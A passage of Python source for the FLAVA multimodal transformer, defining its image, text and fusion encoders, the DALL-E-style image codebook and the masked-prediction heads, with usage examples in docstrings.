FLAVA_PRETRAINING_START_DOCSTRING_EXTRA = r"""
Parameters:
image_codebook ([`nn.Module`]): If passed, the image codebook will be set to this. Otherwise. it will
be initialized using the image_codebook_config defined in the config first as the first parameter.
"""
class FlavaPreTrainedModel(PreTrainedModel):
    """
    An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
    models.
    """

    config_class = FlavaConfig
    base_model_prefix = "flava"
    supports_gradient_checkpointing = True

    def _init_weights(self, module: Union[nn.Linear, nn.Conv2d, nn.LayerNorm]) -> None:
        """Initialize the weights"""
        std = self.config.initializer_range
        if isinstance(module, (nn.Linear, nn.Conv2d)):
            # Slightly different from the TF version which uses truncated_normal for initialization
            # cf https://github.com/pytorch/pytorch/pull/5617
            module.weight.data.normal_(mean=0.0, std=std)
            if module.bias is not None:
                module.bias.data.zero_()
        elif isinstance(module, nn.Embedding):
            module.weight.data.normal_(mean=0.0, std=std)
            if module.padding_idx is not None:
                # Keep the padding embedding at zero.
                module.weight.data[module.padding_idx].zero_()
        elif isinstance(module, nn.LayerNorm):
            module.weight.data.fill_(1.0)
            module.bias.data.zero_()

    def _set_gradient_checkpointing(self, module: "FlavaEncoder", value: bool = False) -> None:
        if isinstance(module, FlavaEncoder):
            module.gradient_checkpointing = value
@add_start_docstrings(
    "The bare FLAVA Image Model transformer outputting raw hidden-states without any specific head on top.",
    FLAVA_START_DOCSTRING.format(config="FlavaImageConfig"),
)
class FlavaImageModel(FlavaPreTrainedModel):
    # Standalone image encoder: patch embeddings -> transformer encoder -> layernorm (+ optional pooler).
    config_class = FlavaImageConfig
    # This override allows us to load FlavaImageModel from FlavaModel/FlavaForPreTraining checkpoints.
    base_model_prefix = "flava.image_model"
    main_input_name = "pixel_values"

    def __init__(self, config: FlavaImageConfig, add_pooling_layer: bool = True):
        """Build patch embeddings, a transformer encoder, a final layernorm and (optionally) a pooler."""
        super().__init__(config)
        self.config = config
        self.embeddings = FlavaImageEmbeddings(config)
        self.encoder = FlavaEncoder(config)
        self.layernorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
        self.pooler = FlavaPooler(config) if add_pooling_layer else None
        # Initialize weights and apply final processing.
        self.post_init()

    def get_input_embeddings(self) -> nn.Module:
        # Input "embeddings" for the image tower are the patch-projection module.
        return self.embeddings.patch_embeddings

    def set_input_embeddings(self, value: nn.Module):
        self.embeddings.patch_embeddings = value

    def _prune_heads(self, heads_to_prune: Dict[int, List[int]]) -> None:
        """
        Prunes heads of the model. heads_to_prune: dict of {layer_num: list of heads to prune in this layer} See base
        class PreTrainedModel
        """
        for layer, heads in heads_to_prune.items():
            self.encoder.layer[layer].attention.prune_heads(heads)

    @add_start_docstrings_to_model_forward(FLAVA_IMAGE_INPUTS_DOCSTRING.format("batch_size, image_num_patches"))
    @add_code_sample_docstrings(
        checkpoint=_CHECKPOINT_FOR_DOC,
        output_type=BaseModelOutputWithPooling,
        config_class=_CONFIG_CLASS_FOR_IMAGE_MODEL_DOC,
        modality="vision",
        expected_output=_EXPECTED_IMAGE_OUTPUT_SHAPE,
    )
    def forward(
        self,
        pixel_values: Optional[torch.Tensor] = None,
        bool_masked_pos: Optional[torch.BoolTensor] = None,
        interpolate_pos_encoding: Optional[bool] = None,
        attention_mask: Optional[torch.Tensor] = None,
        head_mask: Optional[torch.Tensor] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
    ) -> Union[tuple, BaseModelOutputWithPooling]:
        # Fall back to config defaults for any unspecified output flags.
        output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
        output_hidden_states = (
            output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
        )
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict
        if pixel_values is None:
            raise ValueError("You have to specify pixel_values")
        # Prepare head mask if needed
        # 1.0 in head_mask indicate we keep the head
        # attention_probs has shape bsz x n_heads x N x N
        # input head_mask has shape [num_heads] or [num_hidden_layers x num_heads]
        # and head_mask is converted to shape [num_hidden_layers x batch x num_heads x seq_length x seq_length]
        head_mask = self.get_head_mask(head_mask, self.config.num_hidden_layers)
        embedding_output = self.embeddings(
            pixel_values, bool_masked_pos=bool_masked_pos, interpolate_pos_encoding=interpolate_pos_encoding
        )
        encoder_outputs = self.encoder(
            embedding_output,
            attention_mask=attention_mask,
            head_mask=head_mask,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )
        sequence_output = encoder_outputs[0]
        # Final layernorm is applied here, outside the encoder stack.
        sequence_output = self.layernorm(sequence_output)
        pooled_output = self.pooler(sequence_output) if self.pooler is not None else None
        if not return_dict:
            # Tuple output: (last_hidden_state, pooled_output, *encoder extras).
            return (sequence_output, pooled_output) + encoder_outputs[1:]
        return BaseModelOutputWithPooling(
            last_hidden_state=sequence_output,
            pooler_output=pooled_output,
            hidden_states=encoder_outputs.hidden_states,
            attentions=encoder_outputs.attentions,
        )
@add_start_docstrings(
    "The bare FLAVA Text Model transformer outputting raw hidden-states without any specific head on top.",
    FLAVA_START_DOCSTRING.format(config="FlavaTextConfig"),
)
class FlavaTextModel(FlavaPreTrainedModel):
    # Standalone text encoder: word/position/token-type embeddings -> transformer encoder -> layernorm (+ pooler).
    config_class = FlavaTextConfig
    # This override allows us to load FlavaTextModel from FlavaModel/FlavaForPreTraining checkpoints.
    base_model_prefix = "flava.text_model"

    def __init__(self, config: FlavaTextConfig, add_pooling_layer: bool = True):
        """Build text embeddings, a transformer encoder, a final layernorm and (optionally) a pooler."""
        super().__init__(config)
        self.config = config
        self.embeddings = FlavaTextEmbeddings(config)
        self.encoder = FlavaEncoder(config)
        self.layernorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
        self.pooler = FlavaPooler(config) if add_pooling_layer else None
        # Initialize weights and apply final processing.
        self.post_init()

    # Annotation corrected: this returns the word-embedding module (an `nn.Embedding`); the
    # previous `-> PatchEmbeddings` annotation was a copy-paste from the image model.
    def get_input_embeddings(self) -> nn.Module:
        return self.embeddings.word_embeddings

    def set_input_embeddings(self, value: nn.Module):
        self.embeddings.word_embeddings = value

    def _prune_heads(self, heads_to_prune: Dict[int, List[int]]) -> None:
        """
        Prunes heads of the model. heads_to_prune: dict of {layer_num: list of heads to prune in this layer} See base
        class PreTrainedModel
        """
        for layer, heads in heads_to_prune.items():
            self.encoder.layer[layer].attention.prune_heads(heads)

    @add_start_docstrings_to_model_forward(FLAVA_TEXT_INPUTS_DOCSTRING.format("batch_size, text_seq_length"))
    @add_code_sample_docstrings(
        checkpoint=_CHECKPOINT_FOR_DOC,
        output_type=BaseModelOutputWithPooling,
        config_class=_CONFIG_CLASS_FOR_TEXT_MODEL_DOC,
    )
    def forward(
        self,
        input_ids: Optional[torch.Tensor] = None,
        attention_mask: Optional[torch.Tensor] = None,
        token_type_ids: Optional[torch.Tensor] = None,
        position_ids: Optional[torch.Tensor] = None,
        head_mask: Optional[torch.Tensor] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
    ) -> Union[tuple, BaseModelOutputWithPooling]:
        # Fall back to config defaults for any unspecified output flags.
        output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
        output_hidden_states = (
            output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
        )
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict
        if input_ids is None:
            raise ValueError("You have to specify input_ids")
        input_shape = input_ids.size()
        if attention_mask is None:
            # Default mask: attend to every token.
            attention_mask = torch.ones(input_shape, device=input_ids.device)
        # Prepare head mask if needed
        # 1.0 in head_mask indicate we keep the head
        # attention_probs has shape bsz x n_heads x N x N
        # input head_mask has shape [num_heads] or [num_hidden_layers x num_heads]
        # and head_mask is converted to shape [num_hidden_layers x batch x num_heads x seq_length x seq_length]
        head_mask = self.get_head_mask(head_mask, self.config.num_hidden_layers)
        # Expand the 2D padding mask to the additive 4D form the encoder expects.
        extended_attention_mask: torch.Tensor = self.get_extended_attention_mask(
            attention_mask, input_shape, input_ids.device
        )
        embedding_output = self.embeddings(
            input_ids=input_ids,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
        )
        encoder_outputs = self.encoder(
            embedding_output,
            attention_mask=extended_attention_mask,
            head_mask=head_mask,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )
        sequence_output = encoder_outputs[0]
        # Final layernorm is applied here, outside the encoder stack.
        sequence_output = self.layernorm(sequence_output)
        pooled_output = self.pooler(sequence_output) if self.pooler is not None else None
        if not return_dict:
            # Tuple output: (last_hidden_state, pooled_output, *encoder extras).
            return (sequence_output, pooled_output) + encoder_outputs[1:]
        return BaseModelOutputWithPooling(
            last_hidden_state=sequence_output,
            pooler_output=pooled_output,
            hidden_states=encoder_outputs.hidden_states,
            attentions=encoder_outputs.attentions,
        )
@add_start_docstrings(
    "The bare FLAVA Multimodal Model transformer outputting raw hidden-states without any specific head on top.",
    FLAVA_START_DOCSTRING.format(config="FlavaMultimodalConfig"),
)
class FlavaMultimodalModel(FlavaPreTrainedModel):
    # Fusion encoder: consumes concatenated (already-embedded) image+text hidden states.
    config_class = FlavaMultimodalConfig
    # This override allows us to load FlavaMultimodalModel from FlavaModel/FlavaForPreTraining checkpoints.
    base_model_prefix = "flava.multimodal_model"
    # Input is a pre-computed embedding sequence, not raw ids/pixels.
    main_input_name = "hidden_states"

    def __init__(self, config: FlavaMultimodalConfig, add_pooling_layer=True):
        """Build the fusion transformer: optional CLS token, encoder, layernorm and (optionally) a pooler."""
        super().__init__(config)
        self.config = config
        self.use_cls_token = self.config.use_cls_token
        if self.use_cls_token:
            # Learned CLS token prepended to the fused sequence (initialized to zeros; trained).
            self.cls_token = nn.Parameter(torch.zeros(1, 1, config.hidden_size))
        self.encoder = FlavaEncoder(config)
        self.layernorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
        self.pooler = FlavaPooler(config) if add_pooling_layer else None
        # Initialize weights and apply final processing.
        self.post_init()

    def _prune_heads(self, heads_to_prune: Dict[int, List[int]]) -> None:
        """
        Prunes heads of the model. heads_to_prune: dict of {layer_num: list of heads to prune in this layer} See base
        class PreTrainedModel
        """
        for layer, heads in heads_to_prune.items():
            self.encoder.layer[layer].attention.prune_heads(heads)

    @add_start_docstrings_to_model_forward(
        FLAVA_MULTIMODAL_INPUTS_DOCSTRING.format("batch_size, image_num_patches + text_seq_len")
    )
    @add_code_sample_docstrings(
        checkpoint=_CHECKPOINT_FOR_DOC,
        output_type=BaseModelOutputWithPooling,
        config_class=_CONFIG_CLASS_FOR_MULTIMODAL_MODEL_DOC,
    )
    def forward(
        self,
        hidden_states: torch.Tensor,
        attention_mask: Optional[torch.Tensor] = None,
        head_mask: Optional[torch.Tensor] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
    ) -> Union[tuple, BaseModelOutputWithPooling]:
        # Fall back to config defaults for any unspecified output flags.
        output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
        output_hidden_states = (
            output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
        )
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict
        batch_size, seq_length, _ = hidden_states.size()
        if self.use_cls_token:
            # Prepend the CLS token; the sequence (and the default mask below) grows by one position.
            # NOTE(review): a caller-supplied attention_mask must already account for the extra
            # CLS position — confirm with callers.
            cls_tokens = self.cls_token.expand(batch_size, -1, -1)
            hidden_states = torch.cat((cls_tokens, hidden_states), dim=1)
            seq_length += 1
        if attention_mask is None:
            attention_mask = torch.ones((batch_size, seq_length), device=hidden_states.device)
        # Prepare head mask if needed
        # 1.0 in head_mask indicate we keep the head
        # attention_probs has shape bsz x n_heads x N x N
        # input head_mask has shape [num_heads] or [num_hidden_layers x num_heads]
        # and head_mask is converted to shape [num_hidden_layers x batch x num_heads x seq_length x seq_length]
        head_mask = self.get_head_mask(head_mask, self.config.num_hidden_layers)
        # Expand the 2D padding mask to the additive 4D form the encoder expects.
        extended_attention_mask: torch.Tensor = self.get_extended_attention_mask(
            attention_mask, (batch_size, seq_length), hidden_states.device
        )
        encoder_outputs = self.encoder(
            hidden_states,
            attention_mask=extended_attention_mask,
            head_mask=head_mask,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )
        sequence_output = encoder_outputs[0]
        # Final layernorm is applied here, outside the encoder stack.
        sequence_output = self.layernorm(sequence_output)
        pooled_output = self.pooler(sequence_output) if self.pooler is not None else None
        if not return_dict:
            # Tuple output: (last_hidden_state, pooled_output, *encoder extras).
            return (sequence_output, pooled_output) + encoder_outputs[1:]
        return BaseModelOutputWithPooling(
            last_hidden_state=sequence_output,
            pooler_output=pooled_output,
            hidden_states=encoder_outputs.hidden_states,
            attentions=encoder_outputs.attentions,
        )
@add_start_docstrings(
    "The bare FLAVA Model transformer outputting raw hidden-states without any specific head on top.",
    FLAVA_START_DOCSTRING.format(config="FlavaConfig"),
)
class FlavaModel(FlavaPreTrainedModel):
    # Full FLAVA backbone: image tower + text tower + multimodal fusion encoder, plus the
    # projection layers used for contrastive training.
    config_class = FlavaConfig

    def __init__(self, config: FlavaConfig):
        """Build the unimodal encoders, the multimodal fusion encoder and the projection layers."""
        super().__init__(config)
        # Validate the nested sub-configs before constructing any submodule.
        if not isinstance(config.text_config, FlavaTextConfig):
            raise ValueError(
                "config.text_config is expected to be of type FlavaTextConfig but is of type"
                f" {type(config.text_config)}."
            )
        if not isinstance(config.image_config, FlavaImageConfig):
            raise ValueError(
                "config.image_config is expected to be of type FlavaImageConfig but is of type"
                f" {type(config.image_config)}."
            )
        if not isinstance(config.multimodal_config, FlavaMultimodalConfig):
            raise ValueError(
                "config.multimodal_config is expected to be of type FlavaMultimodalConfig but "
                + f"is of type {type(config.multimodal_config)}."
            )
        text_config = config.text_config
        image_config = config.image_config
        multimodal_config = config.multimodal_config
        self.projection_dim = config.projection_dim
        self.text_hidden_size = text_config.hidden_size
        self.image_hidden_size = image_config.hidden_size
        self.mm_hidden_size = multimodal_config.hidden_size
        self.text_model = FlavaTextModel(text_config)
        self.image_model = FlavaImageModel(image_config)
        self.multimodal_model = FlavaMultimodalModel(multimodal_config)
        # Projections into the shared contrastive embedding space.
        self.image_projection = nn.Linear(self.image_hidden_size, self.projection_dim)
        self.text_projection = nn.Linear(self.text_hidden_size, self.projection_dim)
        # Learnable temperature for contrastive logits (stored in log space).
        self.logit_scale = nn.Parameter(torch.ones([]) * self.config.logit_scale_init_value)
        # Projections feeding unimodal hidden states into the multimodal encoder.
        self.image_to_mm_projection = nn.Linear(self.image_hidden_size, self.mm_hidden_size)
        self.text_to_mm_projection = nn.Linear(self.text_hidden_size, self.mm_hidden_size)
        # Initialize weights and apply final processing
        self.post_init()

    @add_start_docstrings_to_model_forward(FLAVA_TEXT_INPUTS_DOCSTRING.format("batch_size, text_seq_length"))
    def get_text_features(
        self,
        input_ids: Optional[torch.Tensor] = None,
        attention_mask: Optional[torch.Tensor] = None,
        token_type_ids: Optional[torch.Tensor] = None,
        position_ids: Optional[torch.Tensor] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
    ) -> torch.FloatTensor:
        r"""
        Returns:
            text_features (`torch.FloatTensor` of shape `(batch_size, output_dim`): The text embeddings obtained by
            applying the projection layer to the pooled output of [`FlavaTextModel`].

        Examples:

        ```python
        >>> from transformers import AutoProcessor, FlavaModel

        >>> model = FlavaModel.from_pretrained("{0}")
        >>> processor = AutoProcessor.from_pretrained("{0}")

        >>> inputs = processor(
        ...     text=["a photo of a cat", "a photo of a dog"], max_length=77, padding="max_length", return_tensors="pt"
        ... )
        >>> text_features = model.get_text_features(**inputs)
        ```""".format(
            _CHECKPOINT_FOR_DOC
        )
        text_outputs = self.text_model(
            input_ids=input_ids,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )
        # NOTE(review): this projects the full last_hidden_state (every token position), not a
        # single pooled vector — callers are expected to select the position they need.
        pooled_output = text_outputs[0]  # last_hidden_state
        text_features = self.text_projection(pooled_output)
        return text_features

    @add_start_docstrings_to_model_forward(FLAVA_IMAGE_INPUTS_DOCSTRING.format("batch_size, image_num_patches"))
    def get_image_features(
        self,
        pixel_values: Optional[torch.Tensor] = None,
        bool_masked_pos: Optional[torch.BoolTensor] = None,
        interpolate_pos_encoding: Optional[bool] = None,
        attention_mask: Optional[torch.Tensor] = None,
        head_mask: Optional[torch.Tensor] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
    ) -> torch.FloatTensor:
        r"""
        Returns:
            image_features (`torch.FloatTensor` of shape `(batch_size, output_dim`): The image embeddings obtained by
            applying the projection layer to the pooled output of [`FlavaImageModel`].

        Examples:

        ```python
        >>> from PIL import Image
        >>> import requests

        >>> from transformers import AutoProcessor, FlavaModel

        >>> model = FlavaModel.from_pretrained("{0}")
        >>> processor = AutoProcessor.from_pretrained("{0}")

        >>> url = "http://images.cocodataset.org/val2017/000000039769.jpg"
        >>> image = Image.open(requests.get(url, stream=True).raw)

        >>> inputs = processor(images=image, return_tensors="pt")

        >>> image_features = model.get_image_features(**inputs)
        ```""".format(
            _CHECKPOINT_FOR_DOC
        )
        image_outputs = self.image_model(
            pixel_values=pixel_values,
            bool_masked_pos=bool_masked_pos,
            attention_mask=attention_mask,
            head_mask=head_mask,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            interpolate_pos_encoding=interpolate_pos_encoding,
            return_dict=return_dict,
        )
        # NOTE(review): as in get_text_features, the whole token sequence is projected, not a
        # single pooled vector.
        pooled_output = image_outputs[0]  # last_hidden_state
        image_features = self.image_projection(pooled_output)
        return image_features

    @add_start_docstrings_to_model_forward(
        FLAVA_MODEL_INPUTS_DOCSTRING.format("batch_size, image_num_patches + text_seq_len")
    )
    @replace_return_docstrings(output_type=FlavaModelOutput, config_class=FlavaConfig)
    def forward(
        self,
        input_ids: Optional[torch.LongTensor] = None,
        pixel_values: Optional[torch.FloatTensor] = None,
        attention_mask: Optional[torch.Tensor] = None,
        token_type_ids: Optional[torch.Tensor] = None,
        bool_masked_pos: Optional[torch.Tensor] = None,
        position_ids: Optional[torch.LongTensor] = None,
        image_attention_mask: Optional[torch.Tensor] = None,
        skip_multimodal_encoder: Optional[bool] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: bool = True,
        return_dict: Optional[bool] = None,
    ) -> Union[Tuple, FlavaOutput]:
        r"""
        Returns:

        Examples:

        ```python
        >>> from PIL import Image
        >>> import requests

        >>> from transformers import AutoProcessor, FlavaModel

        >>> model = FlavaModel.from_pretrained("facebook/flava-full")
        >>> processor = AutoProcessor.from_pretrained("facebook/flava-full")

        >>> url = "http://images.cocodataset.org/val2017/000000039769.jpg"
        >>> image = Image.open(requests.get(url, stream=True).raw)

        >>> inputs = processor(text=["a photo of a cat"], images=image, return_tensors="pt", padding=True)

        >>> outputs = model(**inputs)

        >>> logits_per_image = outputs.contrastive_logits_per_image  # this is the image-text similarity score
        >>> probs = logits_per_image.softmax(dim=1)  # we can take the softmax to get the label probabilities
        ```
        """
        return_dict = return_dict if return_dict is not None else self.config.return_dict
        # Hidden states are mandatory: the multimodal branch reads the *pre-layernorm* states
        # from the unimodal towers (see the index-2 accesses below).
        if not output_hidden_states:
            raise ValueError("FLAVA model requires hidden states to work. Please set `output_hidden_states=True`")
        image_embeddings = None
        image_states = None
        image_mm_projection = None
        image_output = None
        if pixel_values is not None:
            image_output = self.image_model(
                pixel_values=pixel_values,
                bool_masked_pos=bool_masked_pos,
                attention_mask=image_attention_mask,
                output_attentions=output_attentions,
                output_hidden_states=output_hidden_states,
                return_dict=return_dict,
            )
            # Index 2 is hidden_states (valid because output_hidden_states is forced True above).
            image_embeddings, image_states = image_output[0], image_output[2]
            # Note that these states don't use final layernorm in the transformer model
            image_mm_projection = self.image_to_mm_projection(image_states[-1])
        text_embeddings = None
        text_states = None
        text_mm_projection = None
        text_output = None
        if input_ids is not None:
            text_output = self.text_model(
                input_ids=input_ids,
                attention_mask=attention_mask,
                position_ids=position_ids,
                token_type_ids=token_type_ids,
                output_attentions=output_attentions,
                output_hidden_states=output_hidden_states,
                return_dict=return_dict,
            )
            # Index 2 is hidden_states (valid because output_hidden_states is forced True above).
            text_embeddings, text_states = text_output[0], text_output[2]
            # Note that these states don't use final layernorm in the transformer model
            text_mm_projection = self.text_to_mm_projection(text_states[-1])
        multimodal_embeddings = None
        multimodal_output = None
        # Fusion runs only when both modalities are present and the caller didn't opt out.
        if image_mm_projection is not None and text_mm_projection is not None and not skip_multimodal_encoder:
            # Image tokens first, then text tokens.
            multimodal_input = torch.cat([image_mm_projection, text_mm_projection], dim=1)
            multimodal_output = self.multimodal_model(multimodal_input, return_dict=return_dict)
            multimodal_embeddings = multimodal_output[0]
        if not return_dict:
            return (
                image_embeddings,
                image_output,
                text_embeddings,
                text_output,
                multimodal_embeddings,
                multimodal_output,
            )
        return FlavaModelOutput(
            image_embeddings=image_embeddings,
            image_output=image_output,
            text_embeddings=text_embeddings,
            text_output=text_output,
            multimodal_embeddings=multimodal_embeddings,
            multimodal_output=multimodal_output,
        )
class FlavaImageCodebookResPath(nn.Module):
    """Residual path of a codebook block: four ReLU+Conv stages (three 3x3, then a 1x1 expansion)."""

    def __init__(self, in_size: int, out_size: int, **kwargs):
        super().__init__()
        # Bottleneck width is a quarter of the output channels.
        hidden = out_size // 4
        stages = [
            ("relu_1", nn.ReLU()),
            ("conv_1", nn.Conv2d(in_size, hidden, kernel_size=3, padding=1)),
            ("relu_2", nn.ReLU()),
            ("conv_2", nn.Conv2d(hidden, hidden, kernel_size=3, padding=1)),
            ("relu_3", nn.ReLU()),
            ("conv_3", nn.Conv2d(hidden, hidden, kernel_size=3, padding=1)),
            ("relu_4", nn.ReLU()),
            ("conv_4", nn.Conv2d(hidden, out_size, kernel_size=1, padding=0)),
        ]
        # Named submodules so checkpoint state-dict keys stay identical.
        self.path = nn.Sequential(OrderedDict(stages))

    def forward(self, x: torch.Tensor) -> torch.Tensor:
        return self.path(x)
class FlavaImageCodebookBlock(nn.Module):
    """Residual codebook block: shortcut (identity or 1x1 projection) plus a depth-scaled residual path."""

    def __init__(self, in_size: int, out_size: int, num_layers: int, **kwargs):
        super().__init__()
        # Scale the residual branch down with total depth, as in the original DALL-E encoder.
        self.post_gain = 1 / (num_layers**2)
        # A 1x1 conv aligns channel counts when a plain identity shortcut is not possible.
        self.id_path = nn.Identity() if in_size == out_size else nn.Conv2d(in_size, out_size, kernel_size=1, padding=0)
        self.res_path = FlavaImageCodebookResPath(in_size, out_size)

    def forward(self, x: torch.Tensor) -> torch.Tensor:
        shortcut = self.id_path(x)
        return shortcut + self.post_gain * self.res_path(x)
class FlavaImageCodebookLayerGroup(nn.Module):
    """A stack of codebook blocks, optionally followed by a 2x max-pool downsampling stage."""

    def __init__(self, num_blocks: int, num_layers: int, in_size: int, out_size: int, use_pool: bool = True):
        super().__init__()
        named = OrderedDict()
        for idx in range(num_blocks):
            # Only the first block changes the channel count; the rest keep out_size.
            src_channels = in_size if idx == 0 else out_size
            named[f"block_{idx + 1}"] = FlavaImageCodebookBlock(src_channels, out_size, num_layers)
        if use_pool:
            named["pool"] = nn.MaxPool2d(kernel_size=2)
        self.group = nn.Sequential(named)

    def forward(self, x: torch.Tensor) -> torch.Tensor:
        return self.group(x)
# Inspired by DALLE Encoder in https://github.com/openai/DALL-E/blob/5be4b236bc3ade6943662354117a0e83752cc322/dall_e/encoder.py#L42
@add_start_docstrings(
    """
    The FLAVA's image codebook model inspired from DALL-E's original encoder. Outputs raw hidden states and can be used
    to generate image tokens for an image based on DALL-E's vocab. Used to generate labels for MIM. Use
    `get_codebook_indices` to get image tokens for an image.
    """,
    FLAVA_START_DOCSTRING.format(config="FlavaImageCodebookConfig"),
)
class FlavaImageCodebook(FlavaPreTrainedModel):
    base_model_prefix = ""
    config_class = FlavaImageCodebookConfig
    main_input_name = "pixel_values"
    supports_gradient_checkpointing = False

    def __init__(
        self,
        config: FlavaImageCodebookConfig,
        **kwargs: Any,
    ):
        """Build the four-group convolutional encoder mapping pixels to per-position vocab logits."""
        super().__init__(config)
        self.config = config
        self.num_groups = config.num_groups
        self.input_channels = config.input_channels
        self.num_blocks_per_group = config.num_blocks_per_group
        self.hidden_size = config.hidden_size
        self.vocab_size = config.vocab_size
        # Total block count; used to scale each block's residual branch.
        num_layers = self.num_groups * self.num_blocks_per_group
        # Final ReLU + 1x1 conv turning the deepest features into codebook logits.
        output_blocks = OrderedDict()
        output_blocks["relu"] = nn.ReLU()
        output_blocks["conv"] = nn.Conv2d(8 * self.hidden_size, self.vocab_size, kernel_size=1, padding=0)
        # Channel widths grow 1x -> 2x -> 4x -> 8x hidden_size across groups; the first three
        # groups also halve the spatial resolution (max-pool), the last one does not.
        blocks = OrderedDict()
        blocks["input"] = nn.Conv2d(self.input_channels, 1 * self.hidden_size, kernel_size=7, padding=3)
        blocks["group_1"] = FlavaImageCodebookLayerGroup(
            self.num_blocks_per_group, num_layers, 1 * self.hidden_size, 1 * self.hidden_size
        )
        blocks["group_2"] = FlavaImageCodebookLayerGroup(
            self.num_blocks_per_group, num_layers, 1 * self.hidden_size, 2 * self.hidden_size
        )
        blocks["group_3"] = FlavaImageCodebookLayerGroup(
            self.num_blocks_per_group, num_layers, 2 * self.hidden_size, 4 * self.hidden_size
        )
        blocks["group_4"] = FlavaImageCodebookLayerGroup(
            self.num_blocks_per_group, num_layers, 4 * self.hidden_size, 8 * self.hidden_size, use_pool=False
        )
        blocks["output"] = nn.Sequential(output_blocks)
        self.blocks = nn.Sequential(blocks)
        # Initialize weights and apply final processing.
        self.post_init()
        if self.config.freeze:
            # The codebook is typically used frozen, purely as a MIM label generator.
            for param in self.parameters():
                param.requires_grad = False

    def get_codebook_indices(self, pixel_values: torch.Tensor) -> torch.Tensor:
        # NOTE(review): the string below is formatted after the fact, so it is an expression
        # statement rather than a real docstring — it exists for doc tooling.
        """
        Args:
            pixel_values (`torch.FloatTensor` of shape `(batch_size, num_channels, height, width)`):
                Pixel values. Codebook pixel values can be obtained using [`AutoImageProcessor`] by passing
                `return_codebook_pixels=True`. See [`FlavaImageProcessor.__call__`] for details.

        Examples:
        ```python
        >>> from PIL import Image
        >>> import requests
        >>> from transformers import AutoImageProcessor, FlavaImageCodebook

        >>> model = FlavaImageCodebook.from_pretrained("{0}")
        >>> image_processor = AutoImageProcessor.from_pretrained("{0}")

        >>> url = "http://images.cocodataset.org/val2017/000000039769.jpg"
        >>> image = Image.open(requests.get(url, stream=True).raw)

        >>> inputs = image_processor([image], return_codebook_pixels=True, return_tensors="pt")
        >>> inputs = dict(pixel_values=inputs.codebook_pixel_values)

        >>> outputs = model.get_codebook_indices(**inputs)
        ```
        """.format(
            _CHECKPOINT_FOR_CODEBOOK_DOC
        )
        z_logits = self.blocks(pixel_values)
        # Hard assignment: index of the highest-logit codebook entry per spatial position.
        return torch.argmax(z_logits, axis=1)

    def get_codebook_probs(self, pixel_values: torch.Tensor) -> torch.Tensor:
        # Soft assignment: per-position probability distribution over the codebook vocab.
        z_logits = self.blocks(pixel_values)
        return nn.Softmax(dim=1)(z_logits)

    def forward(self, pixel_values: torch.FloatTensor) -> torch.Tensor:
        """
        Args:
            pixel_values (`torch.FloatTensor` of shape `(batch_size, num_channels, height, width)`):
                Pixel values. Codebook pixel values can be obtained using [`AutoImageProcessor`] by passing
                `return_codebook_pixels=True`. See [`FlavaImageProcessor.__call__`] for details.

        Examples:
        ```python
        >>> from PIL import Image
        >>> import requests
        >>> from transformers import AutoImageProcessor, FlavaImageCodebook

        >>> model = FlavaImageCodebook.from_pretrained("{0}")
        >>> image_processor = AutoImageProcessor.from_pretrained("{0}")

        >>> url = "http://images.cocodataset.org/val2017/000000039769.jpg"
        >>> image = Image.open(requests.get(url, stream=True).raw)

        >>> inputs = image_processor([image], return_codebook_pixels=True, return_tensors="pt")
        >>> inputs = dict(pixel_values=inputs.codebook_pixel_values)

        >>> outputs = model(**inputs)
        >>> print(outputs.shape)
        (1, 196)
        ```
        """.format(
            _CHECKPOINT_FOR_CODEBOOK_DOC
        )
        # Validate rank and channel count before running the conv stack.
        if len(pixel_values.shape) != 4:
            raise ValueError(f"input shape {pixel_values.shape} is not 4d")
        if pixel_values.shape[1] != self.input_channels:
            raise ValueError(f"input has {pixel_values.shape[1]} channels but model built for {self.input_channels}")
        return self.blocks(pixel_values)
class FlavaPredictionHeadTransform(nn.Module):
    """Dense -> activation -> LayerNorm transform applied before a masked-prediction decoder."""

    def __init__(self, config):
        super().__init__()
        self.dense = nn.Linear(config.hidden_size, config.hidden_size)
        # `hidden_act` may be a string key into ACT2FN or a callable already.
        act = config.hidden_act
        self.transform_act_fn = ACT2FN[act] if isinstance(act, str) else act
        self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)

    def forward(self, hidden_states):
        transformed = self.dense(hidden_states)
        transformed = self.transform_act_fn(transformed)
        return self.LayerNorm(transformed)
class FlavaMaskedPredictionHead(nn.Module):
    """Vocabulary decoder head for MIM/MLM: feature transform followed by a linear projection."""

    def __init__(self, config, weight=None):
        super().__init__()
        self.config = config
        self.transform = FlavaPredictionHeadTransform(config)
        # Decoder is created without a bias; a separately-owned bias parameter is attached below.
        self.decoder = nn.Linear(config.hidden_size, config.vocab_size, bias=False)
